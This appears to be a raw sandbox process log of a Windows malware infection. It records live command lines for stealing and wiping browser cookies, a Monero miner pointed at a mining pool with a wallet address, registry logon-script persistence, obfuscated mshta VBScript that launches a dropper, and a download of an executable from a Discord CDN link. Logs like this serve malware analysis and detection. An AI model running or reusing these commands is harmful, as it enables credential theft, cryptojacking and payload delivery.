C:\Users\Admin\AppData\Roaming\6196896.exe
"C:\Users\Admin\AppData\Roaming\6196896.exe"
C:\Users\Admin\AppData\Roaming\8683368.exe
"C:\Users\Admin\AppData\Roaming\8683368.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 276
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5484 -ip 5484
C:\Users\Admin\AppData\Roaming\4252076.exe
"C:\Users\Admin\AppData\Roaming\4252076.exe"
C:\Users\Admin\AppData\Roaming\7488395.exe
"C:\Users\Admin\AppData\Roaming\7488395.exe"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 1568
C:\Users\Admin\AppData\Roaming\4897513.exe
"C:\Users\Admin\AppData\Roaming\4897513.exe"
C:\Users\Admin\AppData\Local\Temp\D44B.exe
C:\Users\Admin\AppData\Local\Temp\D44B.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\is-3JGMC.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-3JGMC.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 1992 -ip 1992
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1992 -s 2388
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 5484 -ip 5484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 1584
C:\Users\Admin\AppData\Local\Temp\is-JCAQF.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-JCAQF.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2992 -ip 2992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6296 -ip 6296
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp" /SL5="$30342,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-JCAQF.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 2444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6296 -s 288
C:\Users\Admin\AppData\Local\Temp\13C6.exe
C:\Users\Admin\AppData\Local\Temp\13C6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5484 -ip 5484
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-K2J2G.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 792
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-K2J2G.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Users\Admin\AppData\Local\Temp\tmpF7AF_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpF7AF_tmp.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1DB90484A59FEC56C3A2910E1380081A C
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding EED7E5E3D63DF81112AC192882F19BBF C
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 5760 -ip 5760
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5760 -s 2416
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F9CFD9ADD76FA026CB908C70EC78FB40
C:\Program Files\Microsoft Office 15\WIJMSTITUY\ultramediaburner.exe
"C:\Program Files\Microsoft Office 15\WIJMSTITUY\ultramediaburner.exe" /VERYSILENT
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Users\Admin\AppData\Local\Temp\is-K2J2G.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-K2J2G.tmp\{app}\vdi_compiler"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp" /SL5="$30552,281924,62464,C:\Program Files\Microsoft Office 15\WIJMSTITUY\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\cd-ab295-225-721bf-6247042dd1c93\Cyzhaesezhumy.exe
"C:\Users\Admin\AppData\Local\Temp\cd-ab295-225-721bf-6247042dd1c93\Cyzhaesezhumy.exe"
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Users\Admin\AppData\Local\Temp\d6-2f696-53d-8b19b-59ca5cc2fd2e7\SHihuxyveny.exe
"C:\Users\Admin\AppData\Local\Temp\d6-2f696-53d-8b19b-59ca5cc2fd2e7\SHihuxyveny.exe"
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5268 -ip 5268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6232 -ip 6232
C:\Users\Admin\Documents\A3GGpMpS6S9hakt7JcJSyVEx.exe
"C:\Users\Admin\Documents\A3GGpMpS6S9hakt7JcJSyVEx.exe"
C:\Users\Admin\Documents\bXNU58dHWxashzCg93wqTRhx.exe
"C:\Users\Admin\Documents\bXNU58dHWxashzCg93wqTRhx.exe"
C:\Users\Admin\Documents\X8VnAVbYWRXEweKGtwdgU_7W.exe
"C:\Users\Admin\Documents\X8VnAVbYWRXEweKGtwdgU_7W.exe"
C:\Users\Admin\Documents\F5zhmkNqfMz3CXMZkPNdCC5u.exe
"C:\Users\Admin\Documents\F5zhmkNqfMz3CXMZkPNdCC5u.exe"
C:\Users\Admin\Documents\Exkm2VeAf9GYWZX6GI4iR5Y3.exe
"C:\Users\Admin\Documents\Exkm2VeAf9GYWZX6GI4iR5Y3.exe"
C:\Users\Admin\Documents\aXzr2HlmBytsRxKAGPwf2IKv.exe
"C:\Users\Admin\Documents\aXzr2HlmBytsRxKAGPwf2IKv.exe"
C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe
"C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe"
C:\Users\Admin\Documents\gME0eA3zT4JpUhNFDSj_8PdB.exe
"C:\Users\Admin\Documents\gME0eA3zT4JpUhNFDSj_8PdB.exe"
C:\Users\Admin\Documents\AU2doFY4OThwjD52g0RzGvvu.exe
"C:\Users\Admin\Documents\AU2doFY4OThwjD52g0RzGvvu.exe"
C:\Users\Admin\Documents\rAoBOEewvs2ao1uDnMy9qoId.exe
"C:\Users\Admin\Documents\rAoBOEewvs2ao1uDnMy9qoId.exe"
C:\Users\Admin\Documents\GU6cMA2h_Nn8pm7KLmwHIqzD.exe
"C:\Users\Admin\Documents\GU6cMA2h_Nn8pm7KLmwHIqzD.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 2448
C:\Users\Admin\Documents\IYj4VNGTqK4xxMUpFyjLGAgC.exe
"C:\Users\Admin\Documents\IYj4VNGTqK4xxMUpFyjLGAgC.exe"
C:\Users\Admin\Documents\jSSzEbguafkdZ215jdnrj8RO.exe
"C:\Users\Admin\Documents\jSSzEbguafkdZ215jdnrj8RO.exe"
C:\Users\Admin\Documents\TOrlUfw8Pg3PdDGgJracYWeT.exe
"C:\Users\Admin\Documents\TOrlUfw8Pg3PdDGgJracYWeT.exe"
C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe
"C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe"
C:\Users\Admin\Documents\tyAtrIBspdV4IxKIk07MutTX.exe
"C:\Users\Admin\Documents\tyAtrIBspdV4IxKIk07MutTX.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Documents\5YJz1sN3WcARkkKdi401MNKQ.exe
"C:\Users\Admin\Documents\5YJz1sN3WcARkkKdi401MNKQ.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\Documents\ygRw4vsp5aXIfWMlbpniVP9J.exe
"C:\Users\Admin\Documents\ygRw4vsp5aXIfWMlbpniVP9J.exe"
C:\Users\Admin\Documents\Np9HXtpLBuBCSA_xWH93BhyI.exe
"C:\Users\Admin\Documents\Np9HXtpLBuBCSA_xWH93BhyI.exe"
C:\Users\Admin\Documents\DSBM8l0UPwHBGY766donVVQm.exe
"C:\Users\Admin\Documents\DSBM8l0UPwHBGY766donVVQm.exe"
C:\Users\Admin\Documents\JECTSnYdIFXrgLSd11VIX8LB.exe
"C:\Users\Admin\Documents\JECTSnYdIFXrgLSd11VIX8LB.exe"
C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe
"C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\8403.bat C:\Users\Admin\Documents\AU2doFY4OThwjD52g0RzGvvu.exe"
C:\Users\Admin\AppData\Local\Temp\is-QF7NU.tmp\5YJz1sN3WcARkkKdi401MNKQ.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QF7NU.tmp\5YJz1sN3WcARkkKdi401MNKQ.tmp" /SL5="$70306,138429,56832,C:\Users\Admin\Documents\5YJz1sN3WcARkkKdi401MNKQ.exe"
C:\Users\Admin\Documents\euXsNX1fFj42iYiFJ9BI28ku.exe
"C:\Users\Admin\Documents\euXsNX1fFj42iYiFJ9BI28ku.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5384 -ip 5384
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 280
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3280 -ip 3280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 424 -ip 424
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7744 -ip 7744
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7bd4ad63-9d96-4e4d-bb77-8d34a1190305}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "FDmp1Bj4S03mI1BrOyUPOUKY.exe" -f
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 280
C:\Users\Admin\Documents\gME0eA3zT4JpUhNFDSj_8PdB.exe
C:\Users\Admin\Documents\gME0eA3zT4JpUhNFDSj_8PdB.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 884
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Roaming\3159338.exe
"C:\Users\Admin\AppData\Roaming\3159338.exe"
C:\Users\Admin\Documents\GU6cMA2h_Nn8pm7KLmwHIqzD.exe
"C:\Users\Admin\Documents\GU6cMA2h_Nn8pm7KLmwHIqzD.exe" -q
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1604 -ip 1604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4324 -ip 4324
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Roaming\2104144.exe
"C:\Users\Admin\AppData\Roaming\2104144.exe"
C:\Users\Admin\AppData\Roaming\8656029.exe
"C:\Users\Admin\AppData\Roaming\8656029.exe"
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 2544 -ip 2544
C:\Users\Admin\AppData\Roaming\2470649.exe
"C:\Users\Admin\AppData\Roaming\2470649.exe"
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "79a6"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 280
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 296
C:\Users\Admin\Documents\xhHbGyxpTSs0YNPujV4XzOPV.exe
"C:\Users\Admin\Documents\xhHbGyxpTSs0YNPujV4XzOPV.exe"
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\8571\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
